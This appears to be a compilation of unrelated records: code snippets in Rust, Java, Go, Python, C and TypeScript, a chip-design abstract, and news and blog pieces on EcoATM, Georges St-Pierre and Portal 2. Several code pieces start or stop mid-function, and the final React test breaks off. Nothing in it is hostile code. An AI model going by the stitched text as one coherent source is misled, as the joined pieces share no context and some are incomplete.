client.callback_urls().map_err(|_| AppError::InternalError)?; if !callback_urls.contains(&redirect_uri) { return Err(AppError::bad_req("'redirect_uri' is invaliid")); } if data.scope.is_some() { let scope_param = data.scope.as_ref().unwrap(); let scopes: HashSet<&str> = scope_param.split_whitespace().collect(); if !scopes.contains("openid") { // we only support oidc atm return Ok(Some(OauthError::new("invalid_request", "scope expected"))); } // only client configured scopes are allowed let client_scopes: HashSet<&str> = client.allowed_scopes.split_whitespace().collect(); if (&scopes - &client_scopes).len() > 0 { return Ok(Some(OauthError::new("invalid_scope", "scope not allowed"))); } } if data.acr_values.is_some() { return Ok(Some(OauthError::new("invalid_request", "invalid acr_value"))); } // TODO! support: "prompt" "display" "ui_locales claims_locales" "auth_time" "max_age" "acr_values" // TODO validate debug!("no error found"); Ok(None) } fn set_on_session(data: &AuthParams, session: &Session) -> Result<(), Error> { session.set("client_id", &data.client_id)?; session.set("scopes", &data.scope)?; session.set("redirect_uri", &data.redirect_uri)?; if data.nonce.is_some() { session.set("nonce", data.nonce.as_ref().unwrap())?; } if data.state.is_some() { session.set("state", data.state.as_ref().unwrap())?; } Ok(()) } static RESPONSE_TYPES: [&'static str; 8] = [ "code", "token", "id_token", "id_token token", "code id_token", "code token", "code id_token token", "none", ]; pub fn contains<T: PartialEq + AsRef<str>>(col: &[T], item: T) -> bool { col.iter().any(|x| &item == x) } fn callback_error(data: &AuthParams, err: OauthError) -> Result<String> { use std::collections::HashMap; use url::Url; info!("{:?}", err); // add the code to the callback URL and return it let mut params: HashMap<&str, &str> = HashMap::new(); params.insert("error", &err.error); if err.error_description.is_some() { params.insert("error_description", err.error_description.as_ref().unwrap()); } if data.state.is_some() { params.insert("state", data.state.as_ref().unwrap()); } let callback_url = Url::parse_with_params(data.redirect_uri.as_ref().unwrap(), params).unwrap(); Ok(callback_url.to_string()) }
A 0.56-mW 63.6-dB SNDR 250-MS/s Two-Step SAR ADC in 8-nm FinFET This letter presents a two-step SAR ADC that uses coarse and fine comparators with dedicated SAR logics and asynchronous clock generators for each comparator to increase the energy efficiency by optimizing comparators and reduce output loading of the comparators and asynchronous clock generators. The relative offset of the two comparators is calibrated by redundancy-based offset detection and input transistor-transconductance controlled offset correction method without compromising the power. A constant impedance skewed inverter saves reference current with low short circuit current without additional CDAC settling time and logic. The ADC is fabricated in an 8-nm FinFET process, and achieves 63.6-dB SNDR at 250-MS/s while consuming 0.56 mW, resulting in Walden FoM of 1.81 fJ/conversion $\cdot $ step.
/** Called by pipelines after they've modified the individual and it might need to be "fixed" -- basically a hook for you to override. By default, calls validateRules on each ruleset. */ public void postprocessIndividual(final EvolutionState state, final int thread) { for (int x=0;x<rulesets.length;x++) rulesets[x].postprocessRules(state,thread); }
/** * Defines per-space configuration properties for {@link GridH2IndexingSpi}. */ public class GridH2IndexingSpaceConfiguration { /** */ private String name; /** */ private boolean idxPrimitiveKey; /** */ private boolean idxPrimitiveVal; /** */ private boolean idxFixedTyping; /** */ private boolean escapeAll; /** * Gets space name to which this configuration applies. * * @return Space name. */ public String getName() { return name; } /** * Sets space name. * * @param name Space name. */ public void setName(String name) { this.name = name; } /** * Gets flag indicating whether indexing SPI should index by key in cases * where key is primitive type * * @return {@code True} if primitive keys should be indexed. */ public boolean isIndexPrimitiveKey() { return idxPrimitiveKey; } /** * Sets flag indicating whether indexing SPI should index by key in cases * where key is primitive type. * * @param idxPrimitiveKey {@code True} if primitive keys should be indexed. */ public void setIndexPrimitiveKey(boolean idxPrimitiveKey) { this.idxPrimitiveKey = idxPrimitiveKey; } /** * Gets flag indicating whether indexing SPI should index by value in cases * where value is primitive type * * @return {@code True} if primitive values should be indexed. */ public boolean isIndexPrimitiveValue() { return idxPrimitiveVal; } /** * Sets flag indexing whether indexing SPI should index by value in cases * where value is primitive type. * * @param idxPrimitiveVal {@code True} if primitive values should be indexed. */ public void setIndexPrimitiveValue(boolean idxPrimitiveVal) { this.idxPrimitiveVal = idxPrimitiveVal; } /** * This flag essentially controls whether all values of the same type have * identical key type. * <p> * If {@code false}, SPI will store all keys in BINARY form to make it possible to store * the same value type with different key types. If {@code true}, key type will be converted * to respective SQL type if it is possible, hence, improving performance of queries. * <p> * Setting this value to {@code false} also means that {@code '_key'} column cannot be indexed and * cannot participate in query where clauses. The behavior of using '_key' column in where * clauses with this flag set to {@code false} is undefined. * * @return {@code True} if SPI should try to convert values to their respective SQL * types for better performance. */ public boolean isIndexFixedTyping() { return idxFixedTyping; } /** * This flag essentially controls whether key type is going to be identical * for all values of the same type. * <p> * If false, SPI will store all keys in BINARY form to make it possible to store * the same value type with different key types. If true, key type will be converted * to respective SQL type if it is possible, which may provide significant performance * boost. * * @param idxFixedTyping {@code True} if SPI should try to convert values to their respective SQL * types for better performance. */ public void setIndexFixedTyping(boolean idxFixedTyping) { this.idxFixedTyping = idxFixedTyping; } /** * If {@code true}, then table name and all column names in 'create table' SQL * generated by SPI are escaped with double quotes. This flag should be set if table name of * column name is H2 reserved word or is not valid H2 identifier (e.g. contains space or hyphen). * <p> * Note if this flag is set then table and column name in SQL queries also must be escaped with double quotes. * @return Flag value. */ public boolean isEscapeAll() { return escapeAll; } /** * If {@code true}, then table name and all column names in 'create table' SQL * generated by SPI are escaped with double quotes. This flag should be set if table name of * column name is H2 reserved word or is not valid H2 identifier (e.g. contains space or hyphen). * <p> * Note if this flag is set then table and column name in SQL queries also must be escaped with double quotes. * @param escapeAll Flag value. */ public void setEscapeAll(boolean escapeAll) { this.escapeAll = escapeAll; } /** {@inheritDoc} */ @Override public String toString() { return S.toString(GridH2IndexingSpaceConfiguration.class, this); } }
/** * This tool can be used to generate a primitive root * for a prime modulus. * * @version 1.0 * @author Mikko Tommila */ public class PrimitiveRoot extends LongModMath { private PrimitiveRoot(long p) { setModulus(p); } public static void main(String[] args) { if (args.length < 1) { System.err.println("Usage: PrimitiveRoot p"); System.err.println(" where p must be prime"); return; } long p = Long.parseLong(args[0]); System.out.println(new PrimitiveRoot(p).findPrimitiveRoot()); } private long findPrimitiveRoot() { long p1 = getModulus() - 1, root = 1; int i; long[] factors = factorize(p1); do { root++; for (i = 0; i < factors.length; i++) { if (modPow(root, p1 / factors[i]) == 1) { break; } } } while (i < factors.length); return root; } private static long[] factorize(long n) { long[] factors = new long[64]; int i; for (i = 0; (n & 1) == 0; i++) { factors[i] = 2; n /= 2; } for (long f = 3; n > 1; f += 2) { for (; n % f == 0; i++) { factors[i] = f; n /= f; } } long[] buffer = new long[i]; System.arraycopy(factors, 0, buffer, 0, i); return buffer; } }
The EcoATM made its debut last week at the 2012 Consumer Electronics Show, but unlike all the other products that manufacturers hoped you’d throw your hard earned dollars at, this innovative piece of tech wants to give you cash for your gadgets. E-waste is a growing problem with few programs in place with enough incentive to get consumers to properly dispose of their unwanted gadgets, but the EcoATM makes recycling your electronics something to get excited over. Akin to the automated aluminum can and glass recycling kiosks found in supermarkets, the EcoATM uses advanced machine vision, electronic diagnostics, and artificial intelligence to evaluate and buy-back your used electronics! To use the EcoATM, simply drop your gadget into the “mouth” of the machine. From there, the EcoATM will take various pictures of your device to determine what kind of shape it is in. Once that is complete, you will need to plug your piece into one of the many cables attached and the machine will conduct numerous tests to see if your gadget is in working condition. After the evaluation is complete, the EcoATM will pay you what it believes your device is worth based on what other e-recycling companies would be will to pay for it. One test conducted by EcoATM founder Bill Bowles found a Verizon iPhone 4 to be worth $221. And while not all electronics will ring up so high, the EcoATM will still offer to take your gadget and give you some dollars for it. So far the ecoATM can only be found in select locations in California, Seattle and the midwest, but if the process is as seamless as the demonstration suggests, we don’t doubt that it will catch on. Check out a video of it in action above!
/* Simulator memory may be accessed after the program has been loaded. */ static int gdbsim_has_all_memory (struct target_ops *ops) { struct sim_inferior_data *sim_data = get_sim_inferior_data (current_inferior (), SIM_INSTANCE_NOT_NEEDED); if (!sim_data->program_loaded) return 0; return 1; }
// Test that it stops retrying if a 4xx response comes back func TestGetURL4xx(t *testing.T) { client := NewHttpClient() retries := 0 ts := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { retries++ http.Error(w, "", 404) })) defer ts.Close() _, err := client.GetRetry(ts.URL) if err == nil { t.Errorf("Incorrect result\ngot: %s\nwant: %s", err.Error(), "Not found. HTTP status code: 404") } if retries > 1 { t.Errorf("Number of retries:\n%d\nExpected number of retries:\n%d", retries, 1) } }
/** * Handles starting a guest processes. * * @returns VBox status code. * @param pSession Guest session. * @param pHostCtx Host context. */ static int vgsvcGstCtrlSessionHandleProcExec(PVBOXSERVICECTRLSESSION pSession, PVBGLR3GUESTCTRLCMDCTX pHostCtx) { AssertPtrReturn(pSession, VERR_INVALID_POINTER); AssertPtrReturn(pHostCtx, VERR_INVALID_POINTER); int rc = VINF_SUCCESS; bool fStartAllowed = false; switch (pHostCtx->uProtocol) { case 1: if (pHostCtx->uNumParms != 11) rc = VERR_NOT_SUPPORTED; break; case 2: if (pHostCtx->uNumParms != 12) rc = VERR_NOT_SUPPORTED; break; default: rc = VERR_NOT_SUPPORTED; break; } if (RT_SUCCESS(rc)) { VBOXSERVICECTRLPROCSTARTUPINFO startupInfo; RT_ZERO(startupInfo); startupInfo.cbEnv = sizeof(startupInfo.szEnv); rc = VbglR3GuestCtrlProcGetStart(pHostCtx, startupInfo.szCmd, sizeof(startupInfo.szCmd), &startupInfo.uFlags, startupInfo.szArgs, sizeof(startupInfo.szArgs), &startupInfo.uNumArgs, startupInfo.szEnv, &startupInfo.cbEnv, &startupInfo.uNumEnvVars, startupInfo.szUser, sizeof(startupInfo.szUser), startupInfo.szPassword, sizeof(startupInfo.szPassword), &startupInfo.uTimeLimitMS, &startupInfo.uPriority, startupInfo.uAffinity, sizeof(startupInfo.uAffinity), &startupInfo.uNumAffinity); if (RT_SUCCESS(rc)) { VGSvcVerbose(3, "Request to start process szCmd=%s, fFlags=0x%x, szArgs=%s, szEnv=%s, uTimeout=%RU32\n", startupInfo.szCmd, startupInfo.uFlags, startupInfo.uNumArgs ? startupInfo.szArgs : "<None>", startupInfo.uNumEnvVars ? startupInfo.szEnv : "<None>", startupInfo.uTimeLimitMS); rc = VGSvcGstCtrlSessionProcessStartAllowed(pSession, &fStartAllowed); if (RT_SUCCESS(rc)) { if (fStartAllowed) rc = VGSvcGstCtrlProcessStart(pSession, &startupInfo, pHostCtx->uContextID); else rc = VERR_MAX_PROCS_REACHED; } } } if (RT_FAILURE(rc)) { VGSvcError("Starting process failed with rc=%Rrc, protocol=%RU32, parameters=%RU32\n", rc, pHostCtx->uProtocol, pHostCtx->uNumParms); if (rc != VERR_TOO_MUCH_DATA) { int rc2 = VbglR3GuestCtrlProcCbStatus(pHostCtx, 0 , PROC_STS_ERROR, rc, NULL , 0 ); if (RT_FAILURE(rc2)) VGSvcError("Error sending start process status to host, rc=%Rrc\n", rc2); } } return rc; }
BERLIN – While mostly staying away from reporters gathered at a CrossFit gym for this weekend’sUFC Fight Night 41 event in Berlin, Georges St-Pierre gave a small update about the goings-on in his life. First, St-Pierre, who is in Germany in support of teammate and Saturday combatant Francis Carmont, is still healing from a second torn ACL. He did not give a timetable for when he will be fully cleared to train, but is hopeful about the outcome. “I had the same procedure on my right knee, and my leg came back stronger,” he said. “I will have two good knees, so it will be a good thing.” In the meantime, the former welterweight champ is watching the sport, including the sudden race near the top between a handful of standout welterweights, from a distance. Robbie Lawler, Matt Brown, Hector Lombard and Dong Hyun Kim are a few of the frontrunners. But St-Pierre, of course, has his eye closer to home. “I’m very happy and very excited, and my friend and training partner Rory MacDonald is part of that group, and I think he is going to be champion,” he said. Nevertheless, the fighter, who this month turned 33, agrees with UFC President Dana White’s assessment that now is an exciting time to watch 170-pounders fight. “It’s true – it is the most exciting time because they have a lot of different contenders,” St-Pierre said. “It’s a lot of new guys. They’re not veterans. I mean, some of them are veterans that were not there before, so it’s a lot of new faces.” Johny Hendricks, of course, is the face and champion after St-Pierre vacated the belt. Hendricks outpointed Lawler at UFC 171 in March. Earlier in his career, St-Pierre might have liked to have erased any doubts about his split-decision win over the new champ at this past November’s UFC 167 event. But he is still finding himself after making the decision to take time off from the sport following that fight. St-Pierre (25-2 MMA, 19-2 UFC) initially said his reasons for stepping away from the sport were personal. As time went on, however, he revealed his issues with the UFC’s drug testing protocol and struggles with obsessive-compulsive disorder (OCD). While he is invested in the welterweight division’s fate, St-Pierre apparently isn’t up to speed on an issue he said was close to his heart. Asked for his thoughts on the random testing funded by the UFC for a recent title fight between light heavyweight champ Jon Jones and Glover Teixeira, he said, “I haven’t followed that.” Whether he does continue to follow the sport or not, however, he will be asked at every turn when he’ll be back. In previous interviews, he’s teased a comeback. But before this particular group of reporters on a rainy Berlin day, he didn’t have answers about his future – only that his past was something less than comfortable to be avoided. “I’ve been doing this for a long time, since I was 19,” he said. “I’m 33 now. When I fought (Carlos) Condit, I was very hungry. I was very happy to be there. I wanted to do it a lot. (Nick) Diaz, a little bit less. And the last training camp I had with (Johny) Hendricks, I didn’t have the same motivation. It went down, and I need to get back to that feeling of hunger. “I need to get the motivation back. It’s hard because it’s always the same routine, the same thing. And I need to fix some things in my life to make it more efficient. Once everything can be done, maybe I’ll come back. We’ll see how it goes. But I can’t say yes, I can’t say no, because I just don’t know right now.” For more on the UFC’s upcoming schedule, stay tuned to the UFC Rumors section of the site.
/** * Operand to a {@link UnifyRule} that matches a relational expression of a given type. */ private static class AnyOperand extends Operand { AnyOperand( Class<? extends MutableRel> clazz ) { super( clazz ); } @Override public boolean matches( SubstitutionVisitor visitor, MutableRel rel ) { return clazz.isInstance( rel ); } }
//QueryRow exec query with args and rows. //Return row. func (d *PlainDB) QueryRow(query string, args ...interface{}) *sql.Row { if d.Optimizer != nil { query, args = d.Optimizer.MustOptimize(query, args) } return d.db.QueryRow(query, args...) }
def user_avatars_db(self, user_id: str) -> RtdbNode: return self.avatars_db() / user_id
#!/usr/bin/env python from resource_management.libraries.script import Script from resource_management.libraries.functions.default import default import functools from resource_management.libraries.functions import get_kinit_path from resource_management.libraries.resources import HdfsResource from resource_management.libraries.functions.get_not_managed_resources import get_not_managed_resources config = Script.get_config() stack_root = Script.get_stack_root() install_dir = stack_root + '/xlearning' download_url = config['configurations']['xlearning-env']['download_url'] filename = download_url.split('/')[-1] version_dir = filename.replace('.tar.gz', '').replace('.tgz', '') xlearning_user = config['configurations']['xlearning-env']['xlearning_user'] xlearning_group = user_group = config['configurations']['cluster-env'][ 'user_group'] log_dir = config['configurations']['xlearning-env']['xlearning_log_dir'] xlearning_pid_file = install_dir + '/bin/xlearning.pid' env_content = config['configurations']['xlearning-env']['env_content'] log_content = config['configurations']['xlearning-env']['log_content'] hostname = config['agentLevelParams']['hostname'] java64_home = config['ambariLevelParams']['java_home'] hadoop_conf_dir = '/etc/hadoop' conf_dir = '/etc/xlearning' security_enabled = config['configurations']['cluster-env']['security_enabled'] hadoop_home = stack_root + '/hadoop' # smokeuser kinit_path_local = get_kinit_path( default('/configurations/kerberos-env/executable_search_paths', None)) smokeuser = config['configurations']['cluster-env']['smokeuser'] smokeuser_principal = config['configurations']['cluster-env'][ 'smokeuser_principal_name'] smoke_user_keytab = config['configurations']['cluster-env']['smokeuser_keytab'] hadoop_bin_dir = hadoop_home + '/bin' hadoop_conf_dir = hadoop_home + '/etc/hadoop' hdfs_site = config['configurations']['hdfs-site'] default_fs = config['configurations']['core-site']['fs.defaultFS'] dfs_type = default("/commandParams/dfs_type", "") hdfs_user = config['configurations']['hadoop-env']['hdfs_user'] hdfs_principal_name = config['configurations']['hadoop-env'][ 'hdfs_principal_name'] hdfs_user_keytab = config['configurations']['hadoop-env']['hdfs_user_keytab'] HdfsResource = functools.partial( HdfsResource, user=hdfs_user, hdfs_resource_ignore_file= "/var/lib/ambari-agent/data/.hdfs_resource_ignore", security_enabled=security_enabled, keytab=hdfs_user_keytab, kinit_path_local=kinit_path_local, hadoop_bin_dir=hadoop_bin_dir, hadoop_conf_dir=hadoop_conf_dir, principal_name=hdfs_principal_name, hdfs_site=hdfs_site, default_fs=default_fs, immutable_paths=get_not_managed_resources(), dfs_type=dfs_type)
ALEXANDER OF APHRODISIAS as he does not give information about the date and textual state of several of the sources he mentions. A more accessible overview of the types of lexicographical activity current in antiquity is provided by J. Barnes’s introduction to Bonelli’s text and commentary. None the less, V.’s edition is an indispensable tool for those interested not only in ancient lexicography but also the study of Plato and Platonic traditions.
#!/usr/bin/env python # coding=utf-8 # Created by: <NAME> # Created on: 5/25/20 import hashlib import os from configparser import ConfigParser from .parameterParser import upload_file_map, history_map def digest_check(file_path): """ Generate hash digest for a file :param file_path: :return: """ h = hashlib.blake2b() with open(file_path, "rb") as fh: for chunk in iter(lambda: fh.read(4096), b""): h.update(chunk) return h.hexdigest() def snapshot_a_job(job_path, input_files, db): """ Create snapshot for a job :param job_path: :param input_files: :param db: :return: """ snapshot = ConfigParser() snapshot.optionxform = str snapshot['input'] = dict() snapshot['output'] = dict() user_dir, _ = os.path.split(job_path) _, user_id = os.path.split(user_dir) if os.path.exists(job_path): for f in os.listdir(job_path): if f == ".snapshot.ini": continue full_path = os.path.join(job_path, f) if os.path.isfile(full_path): ctime = os.path.getctime(full_path) mtime = os.path.getmtime(full_path) digest = digest_check(full_path) snapshot['output'][f] = "%d;%d;%s" % (ctime, mtime, digest) parsed_uploaded_files, _ = upload_file_map(input_files, user_dir) parsed_history_files, _, _ = history_map(parsed_uploaded_files, user_id, db) parsed_inputs = parsed_history_files.split(";") for input_file in parsed_inputs: if os.path.exists(input_file) and os.path.isfile(input_file): ctime = os.path.getctime(input_file) mtime = os.path.getmtime(input_file) digest = digest_check(input_file) snapshot['input'][input_file] = "%d;%d;%s" % (ctime, mtime, digest) with open(os.path.join(job_path, ".snapshot.ini"), 'w') as configfile: snapshot.write(configfile)
<gh_stars>0 /* * vim:ts=4:sw=4:expandtab * * i3 - an improved dynamic tiling window manager * © 2009 <NAME> and contributors (see also: LICENSE) * */ #include "libi3.hpp" #include <math.h> #include <stdlib.h> #include <string.h> #include <xcb/xcb.h> #include <xcb/xcb_aux.h> /* * Try to get the contents of the given atom (for example I3_SOCKET_PATH) from * the X11 root window and return NULL if it doesn’t work. * * If the provided XCB connection is NULL, a new connection will be * established. * * The memory for the contents is dynamically allocated and has to be * free()d by the caller. * */ char *root_atom_contents(const char *atomname, xcb_connection_t *provided_conn, int screen) { xcb_intern_atom_cookie_t atom_cookie; xcb_intern_atom_reply_t *atom_reply; char *content = NULL; size_t content_max_words = 256; xcb_connection_t *conn = provided_conn; if (provided_conn == NULL && ((conn = xcb_connect(NULL, &screen)) == NULL || xcb_connection_has_error(conn))) { return NULL; } atom_cookie = xcb_intern_atom(conn, 0, strlen(atomname), atomname); xcb_screen_t *root_screen = xcb_aux_get_screen(conn, screen); xcb_window_t root = root_screen->root; atom_reply = xcb_intern_atom_reply(conn, atom_cookie, NULL); if (atom_reply == NULL) { goto out_conn; } xcb_get_property_cookie_t prop_cookie; xcb_get_property_reply_t *prop_reply; prop_cookie = xcb_get_property_unchecked(conn, false, root, atom_reply->atom, XCB_GET_PROPERTY_TYPE_ANY, 0, content_max_words); prop_reply = xcb_get_property_reply(conn, prop_cookie, NULL); if (prop_reply == NULL) { goto out_atom; } if (xcb_get_property_value_length(prop_reply) > 0 && prop_reply->bytes_after > 0) { /* We received an incomplete value. Ask again but with a properly * adjusted size. */ content_max_words += ceil(prop_reply->bytes_after / 4.0); /* Repeat the request, with adjusted size */ free(prop_reply); prop_cookie = xcb_get_property_unchecked(conn, false, root, atom_reply->atom, XCB_GET_PROPERTY_TYPE_ANY, 0, content_max_words); prop_reply = xcb_get_property_reply(conn, prop_cookie, NULL); if (prop_reply == NULL) { goto out_atom; } } if (xcb_get_property_value_length(prop_reply) == 0) { goto out; } if (prop_reply->type == XCB_ATOM_CARDINAL) { /* We treat a CARDINAL as a >= 32-bit unsigned int. The only CARDINAL * we query is I3_PID, which is 32-bit. */ sasprintf(&content, "%u", *((unsigned int *)xcb_get_property_value(prop_reply))); } else { sasprintf(&content, "%.*s", xcb_get_property_value_length(prop_reply), (char *)xcb_get_property_value(prop_reply)); } out: free(prop_reply); out_atom: free(atom_reply); out_conn: if (provided_conn == NULL) xcb_disconnect(conn); return content; }
/** * Returns a newsFeedResponseItem that will be sent to front end to handle grouped trip updates * @return newsFeedResponseItem sent to front end */ @Override public CompletableFuture<NewsFeedResponseItem> execute() { return getUserProfileAsync().thenComposeAsync(profile -> getReferencedTripAsync().thenApplyAsync(trip -> { List<Destination> newDestinations = trip.tripDataList.stream() .filter(x -> newDestIds.contains(x.destination.id)) .map(x -> x.destination) .filter(StreamHelper.distinctByKey(x -> x.id)) .collect(Collectors.toList()); ObjectNode returnObject = new ObjectNode(new JsonNodeFactory(false)); returnObject.set("trip", Json.toJson(trip)); returnObject.set("newDestinations", Json.toJson(newDestinations)); return new NewsFeedResponseItem( String.format("added %d new destination%s to their trip!", newDestinations.size(), newDestinations.size() == 1 ? "" : "s"), profile.firstName + " " + profile.lastName, profile.profilePhoto, profile.userId, returnObject, eventIds); })); }
package com.github.jira.commons.model; import java.text.ParseException; import java.util.Date; import org.apache.commons.lang.ObjectUtils; import org.apache.commons.lang.StringUtils; import org.apache.commons.lang.builder.EqualsBuilder; import org.apache.commons.lang.builder.HashCodeBuilder; import com.github.jira.commons.util.DateUtils; @SuppressWarnings("serial") public class Version extends Entity { public static final String SELF = "self"; public static final String ID = "id"; public static final String DESCRIPTION = "description"; public static final String NAME = "name"; public static final String OVERDUE = "overdue"; public static final String RELEASE_DATE = "releaseDate"; public static final String ARCHIVED = "archived"; public static final String RELEASED = "released"; @Override public String toString() { return getName(); } @Override public int hashCode() { return new HashCodeBuilder().append(getId()).toHashCode(); } @Override public boolean equals(Object o) { if (o == null || o.getClass() != getClass()) { return false; } if (o == this) { return true; } Version target = (Version) o; return new EqualsBuilder().append(getId(), target.getId()).isEquals(); } public String getSelf() { return StringUtils.defaultString((String) get(SELF)); } public String getId() { return StringUtils.defaultString((String) get(ID)); } public String getDescription() { return StringUtils.defaultString((String) get(DESCRIPTION)); } public String getName() { return StringUtils.defaultString((String) get(NAME)); } public boolean isOverdue() { return (Boolean) ObjectUtils.defaultIfNull(get(OVERDUE), false); } public Date getReleaseDate() { Object read = get(RELEASE_DATE); try { return (read != null) ? DateUtils.parseDate((String) read) : null; } catch (ParseException e) { return null; } } public boolean isArchived() { return (Boolean) ObjectUtils.defaultIfNull(get(ARCHIVED), false); } public boolean isReleased() { return (Boolean) ObjectUtils.defaultIfNull(get(RELEASED), false); } }
def update_item(self, item_id, item_type, item_type_keywords, title, categories, snippet, description, license_info, tags, nb_path, runtime_stamp, thumbnail): item_properties = {"title" : title, "snippet" : snippet, "description" : description, "licenseInfo" : license_info, "tags" : tags, "properties": runtime_stamp} if categories: item_properties["categories"] = categories if item_type: item_properties['type'] = item_type if item_type_keywords: item_properties['typeKeywords'] = item_type_keywords existing_item = self._gis.content.get(item_id) if existing_item: log.debug(f'item {existing_item.homepage} exists, updating...') item_properties["url"] = existing_item.homepage existing_item.update(item_properties, data = nb_path, thumbnail = thumbnail) resp = existing_item else: raise Exception(f"Could not find item {item_id} to update. Failing!") return resp
After nearly 5 months (almost half a year, Jesus Christ), Valve has finally released the first Portal 2 DLC pack into the wild. Titled “Peer Review”, it features a new co-op testing course, or track, if you prefer: “Art Therapy”, it’s called. It takes place… well, that’s best left for you guys to discover. The pack’s also got the brand new Challenge Mode, for both single-player and co-op. Much like Portal 1’s good old Challenges, except they finally got rid of that bulls**t “Least Steps” mode. God, I hated that thing. No new advanced chambers, however. As a matter of fact, there is no new single-player content here at all. There aren’t even any new hats! And the online leaderboards? Well, you’ve got Friends leaderboards, but if you’re expecting huge ranked, worldwide leaderboards, like in Serious Sam HD or Hard Reset, then would you kindly lower your expectations, because the closest thing to that is a graph nestled in the Challenge Mode window. There’s also no way for you to see your previous high scores, or your friends’ previous high scores. It’s a good system, don’t get me wrong, but it’s lacking some pretty fundamental stuff. In any case, let’s move on – there might be a full review of Peer Review on the way soon . You can expect to see another “Vic’s Thoughts On” kind of article for that. Except I’ll never put “Vic’s” in the title. And, hopefully, it won’t be as big. Or as critical. But stranger things have happened. To celebrate Peer Review’s release, Portal 2 is now on sale through Thursday, at a good 50% off. That’s 15 dollars for one of the finest games of the year, or 11 euros, if you live in the United States of Europe. They don’t exist… yet. I’m sure that by the time Portal 2 takes place (52,000 AD? 2500 AD? 2050 AD?), there is a USE of sorts, and it is ruled by a sentient cloud. And they’ve always been at war with Oceania. Which is ruled by… what’s left of LambdaGeneration. Except the letters got smudged up during post-apocalyptic times and now people read it as “LlamaGeneration”. Crazy stuff. The DLC should be downloaded to your game automatically, as a game update. The size is around 723 MB, so you should be able to get it fairly quickly (took 2-3 minutes on my connection). And if you’re a console player, then you can probably pick the DLC up on the various online marketplaces. Again, completely free. What are you waiting for, then? Call up your coop partner, play some Challenge Mode in the mean time, and get ready for some… review! Of the “performed with a peer” kind! I have to admit, I might have just wasted that joke. Could have used it in my upcoming DLC review: “Let’s review Peer Review!”. Eh, that would have been pretty silly. http://thinkwithportals.com/blog.php?id=6430
package types import ( "fmt" sdk "github.com/cosmos/cosmos-sdk/types" "github.com/cosmos/cosmos-sdk/x/auth" ) // Tx represents an already existing blockchain transaction type Tx struct { sdk.TxResponse Messages []sdk.Msg `json:"messages"` Fee auth.StdFee `json:"fee"` Signatures []Signature `json:"signatures"` Memo string `json:"memo"` } // NewTx allows to create a new Tx instance from the given txResponse func NewTx(txResponse sdk.TxResponse) (*Tx, error) { stdTx, ok := txResponse.Tx.(auth.StdTx) if !ok { return nil, fmt.Errorf("unsupported tx type: %T", txResponse.Tx) } // Convert Tendermint signatures into a more human-readable format sigs := make([]Signature, len(stdTx.Signatures), len(stdTx.Signatures)) for i, sig := range stdTx.Signatures { sigs[i] = Signature{ StdSignature: sig, Address: sdk.AccAddress(sig.Address()).String(), } } return &Tx{ TxResponse: txResponse, Fee: stdTx.Fee, Messages: stdTx.GetMsgs(), Signatures: sigs, Memo: stdTx.Memo, }, nil } // FindEventByType searches inside the given tx events for the message having the specified index, in order // to find the event having the given type, and returns it. // If no such event is found, returns an error instead. func (tx Tx) FindEventByType(index int, eventType string) (sdk.StringEvent, error) { for _, ev := range tx.Logs[index].Events { if ev.Type == eventType { return ev, nil } } return sdk.StringEvent{}, fmt.Errorf("no %s event found inside tx with hash %s", eventType, tx.TxHash) } // FindAttributeByKey searches inside the specified event of the given tx to find the attribute having the given key. // If the specified event does not contain a such attribute, returns an error instead. func (tx Tx) FindAttributeByKey(event sdk.StringEvent, attrKey string) (string, error) { for _, attr := range event.Attributes { if attr.Key == attrKey { return attr.Value, nil } } return "", fmt.Errorf("no event with attribute %s found inside tx with hash %s", attrKey, tx.TxHash) } // Signature wraps auth.StdSignature adding the address of the signer type Signature struct { auth.StdSignature Address string `json:"address,omitempty"` }
def loading_Images(): def loading_Image(img_file_name): file_name = os.path.join('.', 'images', img_file_name) img = pygame.image.load(file_name) img.convert() return img return {'game_background': loading_Image('background.png'), 'endPipe': loading_Image('pipe_end.png'), 'bodyPipe': loading_Image('pipe_body.png'), 'WingUp': loading_Image('bird_wing_up.png'), 'WingDown': loading_Image('bird_wing_down.png')}
import * as React from 'react' import { mount, shallow } from 'enzyme' import { SynapseConstants } from '../../../lib/utils' import UserCard, { UserCardProps } from '../../../lib/containers/UserCard' import { UserCardSmall, UserCardSmallProps, } from '../../../lib/containers/UserCardSmall' import UserCardMedium, { UserCardMediumProps, } from '../../../lib/containers/UserCardMedium' import { UserCardLarge } from '../../../lib/containers/UserCardLarge' import { mockUserProfileData } from '../../../mocks/mock_user_profile' import UserCardContextMenu, { UserCardContextMenuProps, MenuAction, } from '../../../lib/containers/UserCardContextMenu' import { SEPERATOR } from '../../../lib/utils/SynapseConstants' const { firstName } = mockUserProfileData const createUserCardContextMenu = (props: UserCardContextMenuProps) => { const wrapper = shallow(<UserCardContextMenu {...props} />) return { wrapper } } const createLargeComponent = (props: UserCardMediumProps) => { const wrapper = shallow<UserCardMedium>( <UserCardMedium {...props} isLarge={true} />, ) const instance = wrapper.instance() return { wrapper, instance } } const createMediumComponent = (props: UserCardMediumProps) => { const wrapper = shallow<UserCardMedium>(<UserCardMedium {...props} />) const instance = wrapper.instance() return { wrapper, instance } } const createSmallComponent = (props: UserCardSmallProps) => { const wrapper = shallow(<UserCardSmall {...props} />) const instance = wrapper.instance() return { wrapper, instance } } // need mount because of the deep render of the children const createMountedComponent = (props: UserCardProps) => { const wrapper = mount<UserCard>(<UserCard {...props} />) const instance = wrapper.instance() return { wrapper, instance } } describe('it renders the different sized cards without failing', () => { const props = { userProfile: mockUserProfileData, } it('renders a small card', () => { const size = SynapseConstants.SMALL_USER_CARD const { wrapper } = createMountedComponent({ ...props, size }) expect(wrapper).toBeDefined() expect(wrapper.find(UserCardSmall)).toHaveLength(1) }) it('renders a medium card', () => { const size = SynapseConstants.MEDIUM_USER_CARD const { wrapper } = createMountedComponent({ ...props, size }) expect(wrapper).toBeDefined() expect(wrapper.find(UserCardMedium)).toHaveLength(1) }) it('renders a large card', () => { const size = SynapseConstants.LARGE_USER_CARD const { wrapper } = createMountedComponent({ ...props, size }) expect(wrapper).toBeDefined() expect(wrapper.find(UserCardLarge)).toHaveLength(1) }) }) describe('it creates the correct UI for the small card', () => { const props = { userProfile: mockUserProfileData, size: SynapseConstants.SMALL_USER_CARD, } it('displays a div with text for a user without an img', () => { const { wrapper } = createSmallComponent({ ...props }) expect(wrapper.render().find('div.SRC-userImgSmall')).toHaveLength(1) expect( wrapper .render() .find('div.SRC-userImgSmall') .text(), ).toEqual(firstName[0]) }) it('displays an img for a user with an img set', () => { const { wrapper } = createSmallComponent({ 